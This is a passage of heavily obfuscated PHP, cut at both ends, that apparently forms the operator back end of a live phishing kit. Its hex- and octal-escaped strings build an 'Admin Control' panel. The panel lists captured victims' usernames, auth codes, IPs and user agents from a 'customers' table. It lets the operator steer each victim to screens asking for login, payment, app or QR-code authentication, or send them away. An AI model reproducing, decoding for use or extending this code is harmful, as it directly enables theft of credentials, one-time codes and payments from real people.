56\164\162\171\50\x74\150\151\x73\51\47\x3e\x3c\151\x20\143\x6c\141\x73\x73\75\x27\x66\141\x20\x66\x61\x2d\x74\162\141\x73\150\47\40\x61\x72\151\x61\55\150\x69\x64\x64\145\156\x3d\x27\x74\x72\x75\145\x27\76\x3c\57\x69\x3e\74\x2f\142\165\x74\x74\x6f\156\x3e\12\x9\11\11\11\x9\74\x2f\164\x64\76\xa\x9\11\x9\x9\x3c\x2f\164\x72\76\12\x9\11\11\11"; } else { $userStatus = "\74\163\x70\141\156\76\x3c\x69\155\x67\40\163\x72\x63\75\x22\160\141\162\164\151\141\x6c\x2f\x69\x6d\x67\57\157\x66\x66\56\160\156\x67\x22\40\163\x74\171\154\145\75\42\167\x69\x64\164\150\x3a\62\60\x70\170\73\x70\x61\x64\144\x69\156\x67\x2d\x72\x69\x67\150\x74\x3a\61\160\x78\x22\76\74\142\76\117\146\x66\154\151\156\x65\74\57\x62\76\74\x2f\163\x70\x61\156\x3e"; $savedStatus = $value["\x6c\x61\163\x74\x5f\x61\x63\x74\151\x76\151\x74\x79"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\156\157\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\x3c\163\160\141\x6e\76\74\151\x6d\x67\40\x73\x72\x63\x3d\42\x70\x61\x72\x74\151\141\x6c\57\x69\155\x67\x2f\157\x6e\56\x70\156\147\42\40\163\x74\171\154\x65\75\42\167\x69\144\x74\x68\72\62\x30\160\x78\x3b\160\141\144\144\151\x6e\x67\x2d\162\151\x67\x68\x74\x3a\x31\x70\170\42\x3e\x3c\x62\76\117\156\x6c\x69\156\x65\x3c\57\x62\76\74\x2f\163\160\141\156\76"; } } else { if ($savedStatus === null) { $userStatus = "\x3c\163\x70\x61\x6e\x3e\x3c\x69\x6d\x67\40\x73\x72\x63\x3d\x22\160\x61\x72\x74\151\x61\x6c\x2f\x69\155\x67\57\x6e\x61\x2e\x70\156\147\42\40\x73\x74\171\154\145\75\x22\167\151\144\x74\150\72\62\x35\x70\x78\x3b\x70\141\144\144\x69\x6e\147\55\162\x69\x67\150\x74\72\x31\160\170\x22\76\74\x62\76\116\x6f\x20\x64\141\x74\x61\74\x2f\142\76\74\x2f\x73\160\141\x6e\76"; } } echo "\xa\x9\11\11\x9\x3c\x74\x72\x20\163\x74\171\x6c\145\75\x27\143\157\154\157\x72\72\167\x68\151\164\145\x27\76\12\x9\x9\x9\x9\x9\x3c\x74\x64\76{$value["\x69\x64"]}\x3c\x2f\164\x64\76\xa\11\11\x9\x9\11\x3c\x74\144\x3e{$value["\165\163\162\154\x6f\x67\x69\156"]}\74\x2f\x74\x64\76\xa\11\11\x9\x9\x9\74\x74\x64\76{$userStatus}\74\x2f\x74\x64\x3e\xa\x9\11\11\x9\11\74\164\144\x3e{$info}\74\x62\x72\x3e{$value["\143\157\155\155\x65\x6e\x74"]}\x3c\x2f\x74\144\76\12\11\11\x9\11\x9\74\x74\x64\x3e\12\11\11\x9\11\x9\11\74\x62\x75\164\x74\157\x6e\40\164\x79\160\x65\75\x27\142\x75\164\x74\x6f\156\x27\x20\x6f\x6e\x63\x6c\x69\143\x6b\x3d\47\x63\x6f\156\164\x72\x6f\x6c\x42\x74\x6e\50\x74\x68\x69\163\51\x27\40\x63\x6c\141\163\163\x3d\x27\x62\x74\156\x20\142\x74\156\55\155\x64\40\142\164\x6e\x2d\x69\x6e\146\x6f\47\x20\x69\144\x3d\47\x75\163\x65\162\151\144\137{$value["\x69\x64"]}\x27\x20\x64\141\164\141\55\x74\x6f\147\x67\x6c\x65\75\x27\155\x6f\144\141\x6c\x27\40\x64\141\x74\x61\x2d\x74\x61\x72\x67\x65\x74\75\47\x23\155\x6f\x64\141\154\x5f\165\x73\x65\162\x69\144\x5f{$value["\x69\144"]}\x27\x3e\x41\x63\164\151\x6f\x6e\74\x2f\142\x75\164\x74\157\x6e\76\12\11\11\11\11\11\x9\x3c\x62\x75\164\164\x6f\156\x20\x74\x79\160\145\x3d\47\x62\165\164\164\x6f\156\x27\x20\143\154\x61\163\163\75\47\142\x74\156\40\x62\x74\x6e\x2d\155\144\x20\142\164\156\55\144\x61\x6e\147\145\x72\47\x20\151\144\75\47\x75\163\x65\x72\x69\x64\x5f{$value["\151\x64"]}\x27\x6f\156\x63\154\151\143\153\75\x27\x64\145\x6c\145\164\x65\x65\156\164\x72\171\50\x74\150\x69\x73\x29\x27\76\74\x69\x20\143\154\x61\163\x73\75\x27\x66\141\40\146\x61\55\164\162\141\x73\x68\47\40\141\x72\x69\141\x2d\x68\151\x64\x64\145\x6e\75\x27\x74\x72\x75\145\47\76\x3c\57\x69\x3e\74\57\142\x75\164\x74\157\156\x3e\xa\11\11\x9\11\11\74\57\x74\x64\x3e\xa\x9\x9\11\11\74\57\164\162\76\12\x9\x9\11\x9"; } } } if (isset($_GET["\x66\145\x74\143\x68\x5f\160\143\137\x6d\157\144\x61\x6c\x5f\144\x61\164\x61"])) { $query = mysqli_query($conn, "\x53\x45\114\105\103\x54\x20\x2a\40\x66\162\x6f\155\x20\x63\x75\163\x74\157\x6d\x65\x72\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\165\x73\x72\x6c\157\x67\151\x6e"]; $authcode = $value["\x61\x75\164\x68\143\157\144\x65"]; $filepath = $value["\x66\x69\x6c\x65\x70\141\x74\150"]; $ip = $value["\151\x70"]; $useragent = urldecode($value["\x75\163\x65\x72\x61\147\x65\156\164"]); $data_log = "\xa\11\11\x9\75\x3d\75\x3d\x3d\76\40\114\117\107\x49\116\40\x3c\75\75\75\x3d\x3d\xa\11\x9\11\125\163\x65\162\156\x61\155\145\x20\72\40{$usrlogin}\12\x9\x9\11\x41\x75\164\150\40\103\157\144\145\40\72\x20{$authcode}\12\x9\x9\11\75\x3d\75\75\75\75\75\x3d\75\x3d\x3d\x3d\x3d\75\75\75\75\x3d\75\x3d\75\x3d\x3d\75\75\75\75\75\x3d\x3d\75\12\x9\11\11\x49\x50\40\x3a\40{$ip}\12\x9\x9\11\125\x41\40\x3a\40{$useragent}\xa\11\11\x9\x3d\75\x3d\75\75\x3d\x3d\x3d\75\75\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\75\75\x3d\75\x3d\75\x3d\75\x3d\75"; echo "\12\11\12\11\x9\11\74\x64\151\x76\40\143\x6c\141\163\163\75\x27\x6d\x6f\x64\141\154\x20\x66\x61\x64\x65\x27\40\151\x64\x3d\x27\155\157\x64\x61\x6c\137\165\x73\145\x72\x69\x64\x5f{$value["\x69\x64"]}\x27\40\164\x61\x62\x69\156\x64\x65\x78\x3d\47\55\61\x27\40\x72\x6f\154\145\75\x27\x64\x69\x61\x6c\157\147\47\40\x61\x72\151\141\55\154\x61\x62\145\154\154\145\x64\142\171\75\47\145\170\x61\x6d\160\154\145\115\157\144\141\154\114\141\142\x65\154\47\40\x61\x72\151\x61\55\150\151\144\x64\x65\x6e\x3d\x27\164\162\x75\x65\47\40\163\164\x79\154\145\x3d\47\x6f\160\x61\x63\151\x74\x79\72\x31\40\41\151\x6d\160\157\x72\x74\141\156\164\x3b\x64\x69\x73\x70\x6c\x61\x79\72\156\157\156\145\x3b\x68\x65\x69\x67\x68\x74\x3a\x31\60\x30\45\x3b\x6f\166\145\162\x66\154\x6f\x77\x3a\x73\x63\x72\157\154\x6c\x3b\x27\x3e\xa\11\11\x9\x9\74\146\x6f\x72\x6d\40\156\141\155\145\x3d\x27\x63\157\156\146\x69\147\x5f\146\157\162\155\x5f{$value["\x69\144"]}\47\x20\151\144\75\47\143\x6f\156\146\151\x67\137\x66\157\162\155\137{$value["\x69\x64"]}\47\x20\155\x65\164\150\157\x64\x3d\47\x50\117\123\124\x27\x20\x61\143\164\151\x6f\x6e\x3d\x27\x27\x20\156\157\166\x61\x6c\151\144\x61\x74\x65\76\xa\11\11\x9\x9\x9\x3c\x69\x6e\x70\x75\x74\40\x74\x79\160\x65\x3d\x27\150\x69\144\144\145\x6e\47\x20\x6e\x61\155\145\75\x27\x75\x73\x65\x72\x69\x64\x27\40\166\x61\x6c\x75\x65\75\x27{$value["\x69\144"]}\x27\76\xa\x9\11\11\11\11\74\x64\151\166\40\x63\154\x61\163\x73\75\47\155\x6f\144\141\154\x2d\x64\151\141\x6c\157\147\x27\x20\x72\157\154\145\75\47\144\157\143\x75\155\145\x6e\164\47\40\x73\x74\171\x6c\145\75\x27\167\x69\x64\164\150\72\x35\60\x30\x70\x78\x27\76\xa\11\x9\x9\11\x9\11\74\144\x69\166\x20\143\154\x61\x73\163\x3d\47\155\x6f\144\141\x6c\x2d\x63\x6f\x6e\x74\145\x6e\x74\x27\40\163\164\171\x6c\145\x3d\x27\x62\141\x63\x6b\x67\162\x6f\x75\156\144\55\x63\157\154\x6f\x72\x3a\40\x62\x6c\x61\x63\153\73\47\x3e\xa\11\11\x9\11\11\x9\x9\x3c\144\151\166\40\143\154\x61\x73\163\75\x27\155\157\144\x61\154\55\x68\x65\141\144\x65\162\x27\40\163\x74\x79\x6c\x65\75\x27\x62\x61\143\153\147\x72\x6f\165\x6e\144\x2d\x63\157\x6c\x6f\162\x3a\43\x33\x34\64\71\65\105\x3b\x66\157\x6e\x74\x2d\x73\x69\x7a\145\72\x32\56\x37\162\145\x6d\x3b\164\x65\x78\164\x2d\x61\154\x69\x67\156\x3a\143\145\156\164\145\x72\x3b\47\76\12\x9\11\11\x9\x9\11\x9\x9\x3c\x68\65\x20\x63\x6c\x61\163\x73\75\47\155\x6f\x64\x61\x6c\55\x74\x69\x74\x6c\145\x27\x20\x69\x64\x3d\x27\145\170\141\155\x70\154\145\115\x6f\x64\x61\154\x4c\141\142\145\x6c\x27\x20\x73\164\171\x6c\145\75\x27\143\157\154\x6f\x72\72\x77\150\151\x74\145\47\x3e\x41\x64\155\151\156\40\x43\x6f\156\164\162\x6f\154\x3c\57\x68\65\76\12\11\11\11\x9\11\11\11\11\74\142\165\164\x74\x6f\x6e\40\164\x79\160\145\75\x27\x62\165\164\164\x6f\x6e\x27\40\x63\x6c\x61\x73\x73\x3d\47\x63\x6c\x6f\163\145\x27\x20\157\156\x63\154\x69\x63\153\x3d\47\x63\x6c\157\x73\x65\137\x62\x74\x6e\50\51\x27\x20\141\x72\x69\141\x2d\154\x61\142\145\154\x3d\47\x43\154\157\x73\x65\x27\x3e\12\x9\x9\x9\11\x9\11\11\11\x9\x3c\x73\160\x61\156\40\141\162\x69\141\55\x68\x69\144\x64\x65\156\75\47\x74\162\x75\145\47\x20\x73\x74\x79\154\x65\75\47\143\157\154\157\x72\72\167\x68\151\x74\145\47\x3e\46\x74\151\x6d\145\x73\73\74\57\163\x70\141\156\76\12\x9\11\x9\11\11\11\11\11\x3c\57\142\x75\164\x74\x6f\156\76\xa\11\11\11\x9\11\x9\11\x3c\x2f\x64\x69\166\x3e\xa\11\11\x9\x9\x9\x9\11\74\144\151\x76\x20\143\x6c\x61\x73\x73\x3d\x27\x6d\157\144\x61\154\x2d\142\157\144\171\47\x3e\12\x9\x9\x9\11\x9\x9\x9\11\74\144\x69\x76\x20\x63\154\141\163\163\75\x27\146\157\162\155\x2d\147\x72\x6f\x75\x70\x27\x20\163\164\x79\154\145\x3d\x27\155\141\x72\147\x69\x6e\x2d\142\157\x74\164\157\x6d\x3a\x31\162\x65\x6d\47\x3e\12\x9\11\11\11\11\11\x9\x9\x9\74\142\162\x3e\12\x9\11\x9\x9\x9\x9\11\11\x9\x3c\164\145\170\x74\141\x72\x65\x61\x20\x69\144\x3d\x27\x74\145\170\164\x61\162\145\x61\157\160\x74\x69\x6f\x6e\163\47\x20\x63\154\x61\x73\163\x3d\x27\146\157\162\155\x2d\x63\157\156\x74\162\157\154\47\40\x64\151\x73\x61\x62\x6c\145\x64\75\x27\x64\x69\x73\141\142\154\x65\144\x27\x20\x72\x6f\x77\x73\x3d\47\x31\66\47\x20\163\164\171\154\145\x3d\x27\x68\x65\x69\x67\150\x74\x3a\63\x30\60\x70\170\73\47\76{$data_log}\x3c\x2f\164\x65\170\x74\x61\x72\145\x61\x3e\12\11\11\x9\11\x9\11\11\x9\x9\x3c\142\x72\x3e\xa\11\11\x9\x9\11\11\x9\11\x9\74\143\x65\156\164\145\162\76\x3c\x69\155\147\x20\163\162\143\75\x27{$filepath}\x27\x20\167\151\x64\164\x68\75\47\61\x30\x30\160\170\x27\x20\x61\154\x74\75\47\x6e\157\x20\x69\x6d\x61\x67\145\x20\x74\x6f\x20\x64\x69\163\x70\x6c\141\171\x27\x3e\x3c\57\143\145\x6e\x74\x65\x72\76\12\x9\x9\x9\x9\11\11\x9\11\74\x2f\144\151\x76\x3e\xa\x9\11\11\11\x9\11\11\x9\x9\xa\11\11\x9\x9\x9\x9\x9\x9\74\x74\141\142\154\145\40\x73\164\x79\x6c\x65\x3d\x27\167\x69\x64\x74\x68\x3a\x20\61\60\x30\45\x3b\142\x61\x63\153\147\162\157\x75\x6e\144\55\x63\157\154\x6f\162\72\x20\x62\154\141\143\x6b\x3b\143\157\154\x6f\162\x3a\40\x77\150\151\164\145\73\x70\x61\144\x64\151\156\147\x3a\x20\x31\x30\45\73\47\x3e\12\11\11\11\x9\11\x9\x9\x9\11\x3c\164\142\157\x64\171\x20\x73\x74\x79\x6c\145\75\x27\154\x69\156\145\x2d\150\145\x69\147\x68\x74\x3a\x31\x30\60\45\x3b\47\x3e\xa\11\11\x9\11\11\11\11\xa\x9\x9\11\x9\x9\11\11\11\x9\x9\x3c\164\x72\x3e\xa\x9\x9\11\x9\x9\11\11\11\x9\x9\x9\x3c\164\144\x3e\12\11\11\11\11\x9\11\x9\x9\11\11\x9\x9\74\144\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\146\157\x72\x6d\55\143\x68\x65\x63\153\x27\x3e\12\11\11\x9\11\x9\11\11\11\x9\x9\11\11\x9\x3c\x6c\141\142\145\x6c\x20\x66\x6f\x72\75\x27\x61\163\153\143\x68\x61\x72\163\x72\x61\x64\x69\x6f\x30{$value["\151\x64"]}\x27\40\143\154\x61\163\163\75\x27\x66\x6f\162\155\x2d\143\x68\145\143\153\x2d\x6c\141\x62\x65\x6c\47\x3e\xa\x9\11\x9\x9\x9\11\x9\11\11\11\x9\11\x9\x9\x3c\x69\156\x70\165\x74\x20\164\x79\x70\x65\75\x27\x72\141\x64\x69\x6f\47\x20\x6e\141\x6d\x65\75\x27\163\164\x61\164\165\x73\x27\x20\x76\141\154\x75\x65\x3d\47\61\61\x27\40\151\x64\75\x27\x61\163\153\x63\x68\141\x72\x73\162\x61\x64\x69\157\60{$value["\x69\144"]}\47\x20\157\x6e\x63\154\x69\x63\153\75\47\x73\150\x6f\167\x66\x69\x65\x6c\144\x73\x28{$value["\x69\x64"]}\x29\73\47\40\143\154\141\x73\x73\x3d\47\x73\x74\141\x74\165\x73\40\146\x6f\x72\x6d\55\143\x68\x65\x63\x6b\x2d\x69\156\160\x75\164\x27\76\12\x9\x9\x9\11\11\11\x9\11\x9\11\x9\x9\11\x9\x3c\163\160\141\156\x3e\x52\x65\x71\x75\x65\x73\x74\x20\114\157\x67\151\x6e\x20\x41\165\164\x68\x3c\x2f\x73\160\141\156\76\12\11\x9\x9\x9\x9\x9\x9\11\x9\11\11\x9\x9\x3c\x2f\x6c\x61\x62\145\x6c\76\12\11\x9\11\x9\x9\x9\11\11\x9\x9\x9\11\74\x2f\x64\x69\x76\x3e\xa\x9\11\11\x9\11\x9\11\11\11\11\x9\x9\x3c\x21\x2d\55\40\x49\156\x70\165\164\40\143\x68\x61\x72\x61\x63\164\x65\162\163\40\x2d\x2d\76\xa\11\x9\11\x9\11\x9\11\x9\11\x9\11\11\x3c\144\x69\166\40\x63\154\x61\x73\x73\75\x27\146\x6f\162\x6d\x2d\147\162\x6f\165\x70\47\x20\x73\164\171\154\x65\x3d\x27\144\151\x73\160\x6c\141\171\x3a\x6e\157\156\145\73\x27\x20\151\x64\x3d\47\141\163\x6b\143\150\141\162\x73\60{$value["\x69\x64"]}\x27\76\xa\x9\11\x9\11\x9\11\x9\11\x9\11\x9\x9\11\x3c\x64\151\166\40\143\154\x61\x73\163\x3d\x27\162\x6f\x77\47\x20\163\164\171\154\x65\75\x27\x6d\x61\x72\x67\151\156\55\x6c\145\146\x74\72\x35\45\73\x6d\x61\162\x67\x69\x6e\x2d\164\x6f\x70\72\65\x70\x78\47\40\x3e\12\x9\11\x9\11\x9\x9\11\x9\x9\x9\x9\11\x9\x9\74\144\x69\166\40\143\x6c\x61\x73\163\75\x27\x63\x6f\154\47\76\xa\11\x9\11\x9\11\11\11\x9\x9\x9\x9\11\11\11\x9\x3c\x69\x6e\160\x75\x74\40\x74\x79\160\x65\75\x27\164\145\x78\x74\47\40\x63\154\141\x73\163\x3d\47\x66\x6f\x72\x6d\x2d\x63\x6f\x6e\164\x72\x6f\154\47\x20\160\x6c\141\143\145\x68\x6f\x6c\x64\145\x72\75\47\105\156\x74\x65\162\x20\143\x6f\x64\145\x20\x68\x65\162\145\x27\40\156\141\x6d\x65\x3d\47\x61\x75\x74\150\x63\x6f\144\x65\x27\40\151\144\x3d\x27\x61\165\x74\x68\143\x6f\144\x65\x27\x20\x73\x74\x79\x6c\x65\x3d\47\x77\x69\144\x74\x68\x3a\x38\x30\x25\73\142\157\162\144\x65\162\x2d\x63\x6f\154\157\162\x3a\43\144\x36\x64\66\x65\x35\47\x3e\12\11\x9\11\11\11\x9\11\x9\x9\x9\11\11\x9\11\74\x2f\x64\151\166\x3e\xa\x9\x9\11\x9\11\x9\11\x9\11\11\x9\x9\x9\74\x2f\x64\x69\x76\x3e\xa\11\x9\11\11\x9\x9\x9\x9\11\x9\x9\11\74\x2f\x64\151\166\x3e\12\x9\x9\x9\x9\x9\11\x9\x9\11\11\x9\x3c\x2f\x74\x64\76\12\x9\11\x9\x9\x9\x9\11\x9\x9\11\x9\74\164\144\76\12\x9\x9\x9\11\11\11\x9\11\x9\x9\x9\11\x3c\x64\151\166\40\x63\154\141\163\x73\75\47\x66\157\162\155\x2d\143\x68\145\x63\153\x27\76\12\x9\x9\x9\11\11\11\11\x9\11\x9\11\x9\x9\x3c\154\x61\142\145\154\x20\x66\x6f\162\x3d\47\141\163\153\x63\x68\141\162\x73\162\x61\x64\151\157\61{$value["\151\144"]}\47\x20\143\154\141\x73\163\x3d\x27\x66\157\x72\x6d\55\143\x68\x65\x63\x6b\55\154\141\142\145\x6c\47\76\12\11\x9\x9\x9\x9\x9\11\11\11\x9\11\x9\x9\11\x3c\151\156\x70\165\164\40\164\171\160\145\75\x27\162\x61\144\x69\157\47\40\x6e\141\x6d\x65\75\47\x73\164\x61\164\165\x73\47\x20\166\x61\154\x75\145\x3d\47\61\x32\x27\40\x69\144\75\x27\141\163\x6b\x63\150\141\x72\163\x72\141\x64\151\157\x31{$value["\x69\x64"]}\x27\40\x6f\x6e\143\154\x69\143\153\75\x27\163\150\x6f\x77\146\x69\145\x6c\x64\163\50{$value["\x69\x64"]}\51\73\47\x20\x63\x6c\141\x73\163\75\x27\x73\x74\x61\x74\165\x73\40\146\157\162\155\x2d\x63\x68\x65\x63\153\x2d\151\156\x70\x75\x74\47\x3e\xa\x9\11\x9\11\11\x9\11\11\11\11\x9\x9\x9\11\74\163\x70\141\156\x3e\122\145\x71\x75\145\x73\x74\x20\x50\x61\x79\155\145\x6e\x74\40\x41\x75\164\x68\x3c\57\163\160\141\x6e\x3e\xa\11\x9\11\11\x9\11\11\x9\11\11\11\x9\x9\74\57\154\x61\x62\x65\x6c\x3e\xa\x9\x9\x9\x9\11\x9\x9\11\11\11\11\11\x3c\x2f\144\x69\x76\76\xa\x9\x9\x9\11\11\11\11\11\11\11\11\74\x2f\164\x64\x3e\12\11\11\11\x9\x9\11\x9\11\11\11\x3c\57\164\x72\76\12\11\11\x9\xa\x9\x9\11\11\x9\x9\11\x9\11\x9\74\164\x72\76\xa\11\x9\x9\11\x9\x9\11\x9\x9\x9\11\x3c\164\x64\76\12\x9\11\11\11\11\x9\x9\x9\x9\11\11\x9\74\x64\151\x76\x20\x63\154\x61\163\x73\x3d\x27\146\x6f\162\155\x2d\x63\x68\145\x63\153\x27\x3e\xa\x9\x9\x9\11\x9\x9\x9\11\11\x9\x9\x9\x9\74\154\x61\x62\145\x6c\x20\x66\x6f\162\x3d\x27\x61\x73\x6b\x63\150\141\162\163\162\x61\x64\151\157\62{$value["\151\144"]}\x27\40\x63\x6c\x61\x73\x73\x3d\x27\146\x6f\162\155\x2d\143\150\145\143\x6b\55\x6c\141\142\145\x6c\x27\x3e\xa\x9\11\11\x9\11\11\11\11\x9\11\x9\11\11\x9\74\x69\x6e\x70\x75\164\40\x74\x79\x70\x65\x3d\47\162\141\144\x69\157\47\x20\156\141\x6d\x65\x3d\x27\x73\x74\141\x74\x75\163\x27\x20\166\141\x6c\x75\x65\75\x27\x31\x33\x27\x20\151\x64\x3d\47\141\x73\153\x63\150\x61\162\163\162\x61\x64\x69\x6f\62{$value["\151\x64"]}\x27\40\157\156\x63\154\151\143\x6b\x3d\x27\x73\x68\x6f\x77\x66\x69\145\x6c\x64\x73\x28{$value["\x69\x64"]}\51\x3b\x27\40\143\154\x61\163\163\x3d\x27\x73\x74\x61\164\165\x73\40\146\157\x72\155\55\x63\150\145\143\153\55\x69\x6e\160\x75\164\47\x3e\xa\11\x9\x9\11\x9\x9\x9\11\11\x9\11\x9\x9\11\x3c\163\160\141\x6e\76\x52\x65\x71\165\145\x73\164\x20\101\160\x70\x20\x41\165\x74\150\74\x2f\x73\160\x61\156\76\xa\11\x9\11\x9\11\11\11\x9\x9\x9\11\11\x9\x3c\x2f\x6c\x61\142\145\154\76\xa\x9\x9\11\11\11\x9\11\x9\x9\11\x9\11\74\x2f\144\151\x76\76\xa\x9\x9\x9\11\x9\11\11\x9\x9\x9\x9\x3c\57\164\x64\x3e\12\11\11\x9\11\11\11\11\x9\x9\x9\x9\74\x74\144\x3e\xa\11\11\x9\11\x9\11\11\x9\11\x9\11\x9\74\144\151\x76\40\143\154\141\x73\x73\75\47\146\157\162\155\55\143\x68\x65\143\x6b\x27\x3e\xa\x9\11\11\x9\11\11\11\x9\x9\x9\x9\11\x9\x3c\x6c\x61\x62\x65\x6c\x20\x66\x6f\162\75\x27\x61\163\x6b\x63\150\x61\162\163\x72\x61\144\151\157\x33{$value["\151\144"]}\47\x20\x63\154\x61\x73\163\x3d\47\146\157\162\x6d\x2d\143\x68\x65\x63\x6b\55\x6c\141\142\x65\x6c\47\x3e\12\x9\11\x9\x9\11\x9\11\x9\x9\11\x9\11\x9\11\x3c\151\156\160\165\x74\40\164\171\160\145\75\47\162\141\144\x69\x6f\x27\40\156\x61\155\x65\x3d\x27\163\x74\141\164\x75\163\x27\x20\x76\x61\x6c\x75\x65\75\47\61\x34\x27\40\x69\144\75\x27\141\163\153\143\x68\141\x72\x73\162\141\x64\151\x6f\x33{$value["\x69\x64"]}\x27\x20\157\x6e\x63\x6c\151\x63\x6b\75\x27\x73\150\157\167\x66\151\x65\x6c\x64\163\x28{$value["\151\x64"]}\51\x3b\47\40\x63\x6c\141\163\163\75\47\x73\x74\x61\164\x75\x73\40\146\x6f\162\x6d\55\x63\x68\x65\143\153\55\x69\x6e\160\165\164\47\76\xa\11\x9\x9\11\11\x9\x9\11\11\11\x9\11\x9\11\x3c\x73\x70\x61\156\76\122\x65\x71\165\145\163\x74\x20\x51\122\x20\x43\x6f\144\x65\74\x2f\x73\x70\141\x6e\x3e\12\11\x9\11\11\x9\x9\x9\11\11\x9\x9\x9\11\74\x2f\154\141\x62\x65\154\76\xa\11\11\x9\11\11\11\x9\x9\x9\x9\x9\11\74\57\x64\x69\x76\x3e\12\x9\11\11\11\x9\x9\11\x9\11\11\x9\74\x2f\x74\x64\76\xa\x9\x9\11\11\x9\x9\11\x9\11\x9\74\57\164\162\x3e\12\x9\11\x9\xa\11\x9\x9\x9\11\x9\11\x9\x9\x9\74\x74\162\x3e\xa\x9\11\x9\11\11\x9\11\x9\x9\11\11\x3c\x74\x64\x3e\12\x9\11\x9\x9\x9\11\11\11\x9\11\x9\x9\x3c\x64\x69\x76\40\x63\x6c\x61\x73\163\75\x27\x66\157\162\155\x2d\143\x68\145\x63\x6b\x27\76\12\x9\11\x9\11\x9\11\11\11\11\11\11\11\11\x3c\154\x61\142\145\x6c\x20\x66\157\x72\75\47\x61\163\153\x6c\157\x67\151\x6e\162\x61\144\151\157{$value["\x69\x64"]}\47\x20\x63\154\x61\x73\x73\75\x27\x66\x6f\x72\155\55\143\x68\145\143\153\55\x6c\141\142\x65\x6c\x27\76\xa\x9\x9\x9\11\x9\x9\11\x9\11\x9\11\x9\x9\11\74\x69\x6e\160\x75\x74\40\164\171\x70\x65\75\x27\x72\141\x64\x69\x6f\47\x20\156\141\155\145\75\x27\163\164\141\164\x75\x73\47\x20\x63\150\x65\143\153\145\144\x20\x76\x61\154\x75\145\x3d\47\x35\x30\x27\x20\151\x64\75\x27\141\x73\153\154\157\147\x69\156\162\x61\144\151\x6f{$value["\x69\x64"]}\47\x20\157\156\143\x6c\151\143\153\x3d\47\x73\x68\x6f\167\x66\151\145\x6c\x64\163\x28{$value["\151\x64"]}\x29\x3b\47\x20\x63\154\141\163\x73\75\x27\163\164\x61\164\x75\163\40\x66\x6f\162\x6d\55\143\x68\145\x63\x6b\x2d\x69\x6e\160\x75\x74\x27\76\xa\x9\x9\11\11\11\x9\11\11\x9\11\11\11\11\x9\x3c\x73\x70\141\156\x3e\x52\x65\x71\165\x65\163\x74\x20\x6c\157\147\151\x6e\40\141\x67\x61\151\156\x20\74\57\163\x70\x61\x6e\x3e\12\11\x9\11\11\11\11\x9\11\11\11\11\x9\x9\x3c\57\x6c\141\x62\145\154\x3e\xa\x9\x9\x9\11\x9\11\11\x9\x9\x9\11\x9\74\57\x64\x69\166\76\12\11\11\x9\x9\x9\x9\11\x9\x9\x9\x9\x3c\x2f\164\x64\76\12\11\x9\11\x9\11\11\x9\11\11\x9\x9\x3c\x74\x64\x3e\xa\11\11\11\x9\11\11\11\11\x9\x9\11\x9\x3c\144\x69\166\40\x63\154\141\x73\x73\x3d\47\146\x6f\x72\155\55\143\x68\145\x63\x6b\47\x3e\12\11\x9\11\x9\x9\11\x9\x9\11\x9\x9\x9\11\74\154\x61\x62\145\x6c\40\x66\x6f\x72\x3d\x27\x73\145\156\144\x61\x77\x61\x79\x72\x61\144\151\157{$value["\151\144"]}\47\x20\x63\x6c\x61\x73\x73\x3d\47\x66\x6f\162\x6d\x2d\x63\150\145\143\153\x2d\x6c\141\142\x65\x6c\47\76\12\x9\x9\11\x9\11\x9\x9\x9\11\x9\11\x9\x9\x9\x3c\151\156\x70\165\x74\x20\164\171\160\145\75\47\x72\141\144\x69\x6f\x27\x20\156\141\155\145\x3d\47\163\x74\141\x74\x75\163\x27\x20\166\141\154\x75\x65\x3d\47\61\x30\x30\x27\x20\151\144\x3d\x27\163\x65\x6e\x64\141\167\x61\171\x72\x61\x64\151\157{$value["\x69\144"]}\x27\40\157\x6e\x63\154\151\143\x6b\x3d\47\163\x68\x6f\x77\146\x69\x65\x6c\x64\x73\x28{$value["\x69\x64"]}\x29\x3b\x27\40\143\154\x61\x73\x73\x3d\47\163\x74\141\x74\x75\163\x20\146\x6f\x72\x6d\55\143\150\145\x63\153\x2d\151\156\x70\x75\x74\x27\76\12\x9\x9\11\x9\x9\11\x9\11\11\11\x9\x9\x9\11\x3c\x73\160\141\156\x3e\111\156\166\141\154\x69\x64\54\x20\123\x65\x6e\x64\40\x61\167\x61\171\74\57\163\x70\141\x6e\x3e\xa\x9\11\x9\x9\11\11\x9\x9\x9\11\x9\11\x9\74\57\x6c\141\142\x65\x6c\76\12\x9\x9\11\x9\11\x9\x9\x9\x9\11\x9\11\74\x2f\144\x69\166\x3e\xa\11\x9\11\11\x9\x9\x9\x9\x9\x9\x9\74\57\x74\144\x3e\12\11\x9\x9\11\x9\11\11\11\11\11\x3c\57\x74\x72\x3e\12\11\11\11\x9\x9\x9\11\x9\11\11\xa\x9\x9\11\11\11\11\x9\x9\11\x9\74\164\162\76\xa\x9\x9\x9\x9\x9\11\11\x9\x9\11\x9\x3c\x74\x64\x3e\xa\11\x9\11\x9\x9\x9\11\x9\11\x9\11\11\x3c\x64\x69\166\x20\x63\154\x61\163\163\75\x27\146\x6f\x72\155\x2d\x63\x68\x65\x63\x6b\x27\76\xa\11\11\11\x9\x9\11\11\11\11\11\11\11\11\x3c\154\x61\x62\x65\154\40\146\157\162\x3d\x27\146\x69\156\151\163\x68\162\141\144\x69\157{$value["\151\144"]}\47\x20\143\154\141\x73\163\x3d\47\146\x6f\x72\x6d\x2d\x63\x68\145\143\x6b\x2d\154\141\x62\145\x6c\47\x3e\xa\11\x9\x9\x9\11\x9\11\x9\x9\x9\x9\11\x9\x9\74\x69\156\160\x75\164\40\164\x79\x70\145\75\47\x72\141\144\151\x6f\47\x20\156\x61\x6d\x65\75\47\x73\164\x61\x74\165\x73\x27\40\166\141\x6c\165\x65\x3d\47\x32\x30\47\40\151\144\75\x27\146\151\x6e\151\163\150\162\x61\x64\151\157{$value["\x69\x64"]}\x27\40\157\x6e\x63\154\151\x63\x6b\75\47\163\x68\x6f\x77\146\151\x65\x6c\x64\x73\50{$value["\151\x64"]}\51\x3b\x27\x20\x63\x6c\141\163\163\75\47\163\x74\141\164\165\163\40\146\x6f\162\x6d\55\143\x68\x65\x63\x6b\x2d\x69\156\160\x75\164\47\76\12\x9\11\11\11\11\x9\11\11\11\x9\